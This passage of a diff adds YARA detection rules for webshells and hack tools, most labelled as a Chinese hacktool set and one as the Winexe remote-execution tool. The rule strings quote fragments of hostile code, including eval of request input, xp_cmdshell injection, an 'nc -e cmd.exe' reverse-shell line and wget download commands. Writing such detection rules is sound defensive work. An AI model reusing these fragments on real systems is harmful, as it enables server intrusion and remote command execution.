+      $s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii
+      $x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
+      $x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
+      $x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $s* ) or ( 1 of ( $s* ) and all of ( $x* ) ) )
+}
+
+rule Winexe_RemoteExec_RID2DD1 : DEMO EXE FILE G0007 HKTL RUSSIA T1035 T1219 {
+   meta:
+      description = "Winexe tool for remote execution (also used by Sofacy group)"
+      author = "Florian Roth"
+      reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+      date = "2015-06-19 10:48:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-02-11"
+      hash1 = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
+      hash2 = "d19dfdbe747e090c5aa2a70cc10d081ac1aa88f360c3f378288a3651632c4429"
+      tags = "DEMO, EXE, FILE, G0007, HKTL, RUSSIA, T1035, T1219"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "error Cannot LogonUser(%s,%s,%s) %d" ascii fullword
+      $s2 = "error Cannot ImpersonateNamedPipeClient %d" ascii fullword
+      $s3 = "\\\\.\\pipe\\ahexec" fullword ascii
+      $s4 = "\\\\.\\pipe\\wmcex" fullword ascii
+      $s5 = "implevel" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 115KB and ( 3 of them or pe.imphash ( ) == "2f8a475933ac82b8e09eaf26b396b54d" )
+}
+
+rule Webshell_Txt_aspx1_RID2E32 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file aspx1.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:04:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[" 
+      $s1 = "],\"unsafe\");%>" fullword ascii
+   condition: 
+      filesize < 150 and all of them
+}
+
+rule Webshell_Shell_Asp_RID2E21 : CHINA DEMO HKTL SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set Webshells - file Asp.html"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:01:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
+      $s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
+      $s3 = "function Command(cmd, str){" fullword ascii
+   condition: 
+      filesize < 100KB and all of them
+}
+
+rule Webshell_Txt_aspxtag_RID2F3D : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file aspxtag.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:48:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "String wGetUrl=Request.QueryString[" fullword ascii
+      $s2 = "sw.Write(wget);" fullword ascii
+      $s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii
+   condition: 
+      filesize < 2KB and all of them
+}
+
+rule Webshell_Txt_php_RID2D8D : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file php.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:36:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii
+      $s2 = "gzuncompress($_SESSION['api']),null);" ascii
+      $s3 = "sprintf('%s?%s',pack(\"H*\"," ascii
+      $s4 = "if(empty($_SESSION['api']))" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule Webshell_Txt_shell_RID2E5D : CHINA DEMO HKTL SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file shell.c"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:11:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii
+      $s2 = "printf(\"Usage: %s <reflect ip> <port>\\n\", prog);" fullword ascii
+      $s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii
+      $s4 = "char shell[]=\"/bin/sh\";" fullword ascii
+      $s5 = "connect back door\\n\\n\");" fullword ascii
+   condition: 
+      filesize < 2KB and 2 of them
+}
+
+rule Webshell_Txt_asp_RID2D89 : CHINA DEMO FILE HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file asp.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:36:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii
+      $s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 100KB and all of them
+}
+
+rule Webshell_Txt_asp1_RID2DBA : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file asp1.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:44:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
+      $s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii
+      $s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+      $s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii
+   condition: 
+      filesize < 70KB and 2 of them
+}
+
+rule Webshell_Txt_php_2_RID2E1E : CHINA DEMO HKTL T1016 T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file php.html"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:00:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1016, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii
+      $s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii
+      $s3 = "<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>" fullword ascii
+      $s4 = "Powered by <a title=\"Build 20130112\" href=\"http://www.4ngel.net\" target=\"_b" ascii
+      $s5 = "formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\\'shell\\',null,this." ascii
+      $s6 = "secparam('IP Configurate',execute('ipconfig -all'));" fullword ascii
+      $s7 = "secparam('Hosts', @file_get_contents('/etc/hosts'));" fullword ascii
+      $s8 = "p('<p><a href=\"http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/\" target=" ascii
+   condition: 
+      filesize < 100KB and 4 of them
+}
+
+rule Webshell_Txt_ftp_RID2D8F : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file ftp.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:37:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "';exec master.dbo.xp_cmdshell 'echo open " ascii
+      $s2 = "';exec master.dbo.xp_cmdshell 'ftp -s:';" ascii
+      $s3 = "';exec master.dbo.xp_cmdshell 'echo get lcx.exe" ascii
+      $s4 = "';exec master.dbo.xp_cmdshell 'echo get php.exe" ascii
+      $s5 = "';exec master.dbo.xp_cmdshell 'copy " ascii
+      $s6 = "ftp -s:d:\\ftp.txt " fullword ascii
+      $s7 = "echo bye>>d:\\ftp.txt " fullword ascii
+   condition: 
+      filesize < 2KB and 2 of them
+}
+
+rule Webshell_Txt_lcx_RID2D8C : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file lcx.c"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:36:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "printf(\"Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-l" ascii
+      $s2 = "sprintf(tmpbuf2,\"\\r\\n########### reply from %s:%d ####################\\r\\n" ascii
+      $s3 = "printf(\" 3: connect to HOST1:PORT1 and HOST2:PORT2\\r\\n\");" fullword ascii
+      $s4 = "printf(\"got,ip:%s,port:%d\\r\\n\",inet_ntoa(client1.sin_addr),ntohs(client1.sin" ascii
+      $s5 = "printf(\"[-] connect to host1 failed\\r\\n\");" fullword ascii
+   condition: 
+      filesize < 25KB and 2 of them
+}
+
+rule Webshell_Txt_jspcmd_RID2EC6 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file jspcmd.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:28:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
+      $s4 = "out.print(\"Hi,Man 2015\");" fullword ascii
+   condition: 
+      filesize < 1KB and 1 of them
+}
+
+rule Webshell_Txt_jsp_RID2D92 : CHINA DEMO HKTL T1007 T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file jsp.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:37:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1007, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
+      $s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
+      $s3 = "<option value=\\\"nc -e cmd.exe 192.168.230.1 4444\\\">nc</option>\"" fullword ascii
+      $s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
+   condition: 
+      filesize < 715KB and 2 of them
+}
+
+rule Webshell_Txt_aspxlcx_RID2F48 : CHINA DEMO FILE HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file aspxlcx.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:50:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "public string remoteip = " ascii
+      $s2 = "=Dns.Resolve(host);" ascii
+      $s3 = "public string remoteport = " ascii
+      $s4 = "public class PortForward" ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 18KB and all of them
+}
+
+rule Webshell_Txt_xiao_RID2DF6 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file xiao.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:54:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
+      $s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
+      $s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii
+      $s4 = "function Command(cmd, str){" fullword ascii
+      $s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii
+   condition: 
+      filesize < 100KB and all of them
+}
+
+rule Webshell_Txt_aspx_RID2E01 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file aspx.jpg"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:56:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+      $s2 = "Process[] p=Process.GetProcesses();" fullword ascii
+      $s3 = "Copyright &copy; 2009 Bin" ascii
+      $s4 = "<td colspan=\"5\">CmdShell&nbsp;&nbsp;:&nbsp;<input class=\"input\" runat=\"serv" ascii
+   condition: 
+      filesize < 100KB and all of them
+}
+
+rule Webshell_Txt_Sql_RID2D75 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file Sql.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 10:32:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd=chr(34)&\"cmd.exe /c \"&request.form(\"cmd\")&\" > 8617.tmp\"&chr(34)" fullword ascii
+      $s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii
+      $s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii
+      $s4 = "session(\"login\")=\"\"" fullword ascii
+   condition: 
+      filesize < 15KB and all of them
+}
+
+rule Webshell_Txt_hello_RID2E59 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - Webshells - file hello.txt"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-14 11:10:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii
+      $s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii
+      $s2 = "myProcess.Start()" fullword ascii
+      $s3 = "<p align=\"center\"><a href=\"?action=cmd\" target=\"_blank\">" fullword ascii
+   condition: 
+      filesize < 25KB and all of them
+}
+
+rule Webshell_ChinaChopper_temp_2_RID3200 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file temp.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:46:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii
+   condition: 
+      filesize < 150 and all of them
+}
+
+rule Webshell_templatr_RID2E0F : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file templatr.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:58:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "eval(gzinflate(base64_decode('" ascii
+   condition: 
+      filesize < 70KB and all of them
+}
+
+rule CN_Tools_srss_RID2C3C : APT CHINA DEMO HKTL SCRIPT {
+   meta:
+      description = "Chinese Hacktool Set - file srss.bat"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:40:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "srss.exe -idx 0 -ip" 
+      $s1 = "-port 21 -logfilter \"_USER ,_P" ascii
+   condition: 
+      filesize < 100 and all of them
+}
+
+rule dll_UnReg_RID2A8D : APT CHINA DEMO HKTL SCRIPT T1117 {
+   meta:
+      description = "Chinese Hacktool Set - file UnReg.bat"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:46:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, HKTL, SCRIPT, T1117"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "regsvr32.exe /u C:\\windows\\system32\\PacketX.dll" fullword ascii
+      $s1 = "del /F /Q C:\\windows\\system32\\PacketX.dll" fullword ascii
+   condition: 
+      filesize < 1KB and 1 of them
+}
+
+rule Webshell_Tools_JSP_cmd_RID2F96 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file cmd.jSp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 12:03:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
+      $s1 = "java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"Conn\"" ascii
+      $s2 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+      $s3 = "out.print(\"Hi,Man 2015<br /><!--?Confpwd=023&Conn=ls-->\");" fullword ascii
+      $s4 = "while((a=in.read(b))!=-1){" fullword ascii
+      $s5 = "out.println(new String(b));" fullword ascii
+      $s6 = "out.print(\"</pre>\");" fullword ascii
+      $s7 = "out.print(\"<pre>\");" fullword ascii
+      $s8 = "int a = -1;" fullword ascii
+      $s9 = "byte[] b = new byte[2048];" fullword ascii
+   condition: 
+      filesize < 3KB and 7 of them
+}
+
+rule Webshell_InjectionParameters_RID325D : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file InjectionParameters.vb"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 14:02:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
+      $s1 = "Public Class InjectionParameters" fullword ascii
+   condition: 
+      filesize < 13KB and all of them
+}
+
+rule Webshell_Customize_4_RID2EFC : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file Customize.aspx"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:37:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ds.Clear();ds.Dispose();}else{SqlCommand cm = Conn.CreateCommand();cm.CommandTex" ascii
+      $s2 = "c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=tr" ascii
+      $s3 = "Stream WF=WB.GetResponseStream();FileStream FS=new FileStream(Z2,FileMode.Create" ascii
+      $s4 = "R=\"Result\\t|\\t\\r\\nExecute Successfully!\\t|\\t\\r\\n\";}Conn.Close();break;" ascii
+   condition: 
+      filesize < 24KB and all of them
+}
+
+rule Webshell_oracle_data_RID2F15 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file oracle_data.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:42:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$txt=fopen(\"oracle_info.txt\",\"w\");" fullword ascii
+      $s1 = "if(isset($_REQUEST['id']))" fullword ascii
+      $s2 = "$id=$_REQUEST['id'];" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Webshell_reDuhServers_reDuh_RID31DF : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file reDuh.jsp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:41:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "out.println(\"[Error]Unable to connect to reDuh.jsp main process on port \" +ser" ascii
+      $s4 = "System.out.println(\"IPC service failed to bind to \" + servicePort);" fullword ascii
+      $s17 = "System.out.println(\"Bound on \" + servicePort);" fullword ascii
+      $s5 = "outputFromSockets.add(\"[data]\"+target+\":\"+port+\":\"+sockNum+\":\"+new Strin" ascii
+   condition: 
+      filesize < 116KB and all of them
+}
+
+rule Webshell_item_old_RID2DF3 : CHINA DEMO HKTL T1100 T1105 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file item-old.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:53:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, T1105, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
+      $s2 = "$sCmd = \"convert \".$sFile.\" -flip -quality 80 \".$sFileOut;" fullword ascii
+      $s3 = "$sHash = md5($sURL);" fullword ascii
+   condition: 
+      filesize < 7KB and 2 of them
+}
+
+rule Webshell_Tools_2014_RID2DDD : CHINA DEMO HKTL T1007 T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file 2014.jsp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:50:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1007, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "((Invoker) ins.get(\"login\")).invoke(request, response," fullword ascii
+      $s4 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
+      $s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii
+   condition: 
+      filesize < 715KB and all of them
+}
+
+rule Dos_1_RID28C7 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file 1.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 18:10:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii
+      $s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule Cmdshell32_RID2AA2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Cmdshell32_RID2AA2.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 07:21:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmdshell.exe" fullword wide
+      $s2 = "cmdshell" fullword ascii
+      $s3 = "[Root@CmdShell ~]#" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 62KB and all of them
+}
+
+rule Webshell_reDuhServers_reDuh_2_RID3270 : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file reDuh.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 14:05:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii
+      $s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii
+      $s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii
+   condition: 
+      filesize < 57KB and all of them
+}
+
+rule Webshell_Customize_5_RID2EFD : CHINA DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file Customize.jsp"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:38:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii
+      $s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
+   condition: 
+      filesize < 30KB and all of them
+}
+
+rule Webshell_CN_Tools_old_RID2F45 : CHINA DEMO HKTL T1100 T1105 WEBSHELL {
+   meta:
+      description = "Chinese Hacktool Set - file old.php"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:50:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, HKTL, T1100, T1105, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
